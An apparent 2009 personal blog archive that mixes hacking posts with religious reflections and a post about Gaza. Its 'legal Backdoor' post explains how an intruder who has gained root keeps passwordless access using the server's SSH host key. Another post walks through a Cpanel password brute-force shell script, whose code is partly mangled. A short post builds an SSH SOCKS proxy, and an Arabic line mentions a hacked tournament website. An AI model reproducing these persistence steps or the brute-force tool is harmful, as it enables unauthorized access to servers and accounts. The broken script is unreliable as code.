Thursday, January 29, 2009

legal Backdoor

Some Hackers they gain root privilege on a secure server but they can't install rootkit or backdoor, so what to do?

actually they can login any time to the server without known the root password!!!

by using RSA or DSA private key to login.

On Server Side:
  • copy the public key "/etc/ssh/ " to "~/.ssh/authorized_keys" with chmod 600
#cp /etc/ssh/ ~/.ssh/authorized_keys
#chmod 600 ~/.ssh/authorized_keys

On Client Side:
  • save the private key "/etc/ssh/ssh_host_dsa_key" to your machine with chmod 600
  • use it with SSH option "-i" to login without password.
#chmod 600 ssh_host_dsa_key

#ssh root@ -i ssh_host_dsa_key

For Windows Users:
  • copy the private key "/etc/ssh/ssh_host_dsa_key" content to window notepad
  • load it in puttygen.exe and save it again with .ppk extension
  • select the key from putty>connection>SSH>Auth

and enjoy login without password ;)

Wednesday, January 21, 2009

"بل تؤثرون الحياة الدنيا والآخرة خير وأبقى"

اعمل لدنياك كأنك تعيش أبداً و اعمل لأخرتك كأنك تموت غداً

Work on your life as if you live at all and Work for your Doomsday as if you die tomorrow

Sunday, January 18, 2009

Create your own socks5 proxy

Do you know that you can create your own socks5 proxy with just one command:

ssh -f -N -D 5050 "USERNAME"

-f -N option is just to run ssh in background, the important option is -D.

from FreeBSD SSH(1) man:

-D [bind_address:]port

Specifies a local "dynamic" application-level port forwarding. This works by allocating a socket to listen to port on the local side.

For windows users they can do it with putty

C:\>putty.exe -ssh "USERNAME" -pw "PASSWORD" -P 22 -D 5050

what we did is that we connect to a ssh server (could by your remote linux or unix server, or a free shell account you have) and give it option to create a tunnel with port forwarding for port 5050

if you set your browser to use socks5 proxy with the address and port 5050, the traffic will be forwarded to the tunnel and you will browse the internet through the remote ssh server.

to disable port forwarding in your server, edit /etc/ssh/sshd_config
and set "AllowTcpForwarding yes" to "no"


Wednesday, January 14, 2009

how to build your own BruteForce tool using linux shell script

Hello, did you ever try to brute force a website login page and you didn't find the right tool?
it always happen, so i will explain how i did it with linux shell script.

I wrote a small script to brute force Cpanel accounts:
#!/usr/bin/env bash
# Cpanel BruteForce v1.0
# Coded By Dr.Death 2008
# drdeath[at]
# This is a simple script that will brute force Cpanel account
# I do not take any reponsibilty for what you do with this tool
# Hopefully it will make your life easier rather then making other
# peoples lives more difficult!
#  _____       _____             _   _
# | __ \ | __ \ | | | |
# | | | |_ __| | | | ___ __ _| |_| |__
# | | | | '__| | | |/ _ \/ _` | __| '_ \
# | |__| | | _| |__| | __/ (_| | |_| | | |
# |_____/|_|(_)_____/ \___|\__,_|\__|_| |_|


".::Cpanel BruteForcer By Dr.Death::."
echo -n "Enter domain name for the Cpanel account you want bruteforce:
> "
read site

n=`cat pass_list | wc -l`
for (( i=1; i <= $n; i++));

password=`sed -n "$i"p pass_list`

b=`lynx -dump -nolist -auth="$password" ""$site":2082"`

echo trying password $password

if [ ! -z "$b" ]; then

echo "Bengo WebSite "$site" password is: "$password""
echo "Have Fun ;)"
exit 0
echo "brute force complete"
echo "no luck, try better dictionary"

lets explain what we did:

  • #!/usr/bin/env bash
to execute the script using bash shell from the environment "env".

  • read site
set the user input as variable "$site" which will be the website domain name.

  • n=`cat pass_list | wc -l`
this will print how many lines in file "pass_list" which include passwords list.

  • for (( i=1; i <= $n; i++));
we put the number we got for the variable "$n" in a for loop, so for example if file pass_list have 1000 password on it we will do the for loop 1000 time, to try all the passwords.

  • password=`sed -n "$i"p pass_list`
here we use "sed" the steam editor with option "p" to print all the passwords in the pass_list in each loop.
for example in loop number 4 variable $i will have value of 4 and the sed comand will be like this:
"sed -n 4p pass_list" which will print the 4th line from the password file pass_list.

  • b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
here we use "lynx" the linux command line browser as a socket to connect to the target website.
we use option "-dump" to dump the output instead of waiting user action, "-nolist" to disable the link list feature in dumps, "-auth=" use to set authorization ID and password for protected documents.
for example to access cpanel account for website "" with username "user" and password "pass" it will be like this:
"lynx -dump -nolist -auth=user:pass"

so password file pass_list should include the usernames and passwords in this format: "username:password"

  • if [ ! -z "$b" ]; then
here we use if statment with option "! -z" which mean if value of "$b" is not equal to Zero we are logged in and the password is the value of the variable "$password" in the loop we are in and exit successfuly, else continue the loop.

Thats all falks :)

Monday, January 12, 2009

لا حول ولا قوة الا بالله

ونسمي انفسنا رجالا!!!!

GAZA We Will Never Forget You

I saw the images and they were disturbing. Images are of the Israeli assault against civilians in Gaza. I did not imagine things in Gaza are going as they are; therefore I forwarded it on to you so that you witness the crimes against humanity that the Israelis carry out.

Visit this site to see what really happen there:

أقرأ الأيات وقارن مع ما يحدث الان

read those words form the Holly Quran, and compare it with the current situation

Sunday, January 11, 2009

اختراق موقع خليجي 19

مسكين هذا الهكر ماله حيله
على العموم مبروك فوز المنتخب العماني فوزه بالبطوله وهاردلك للبقيه

Saturday, January 10, 2009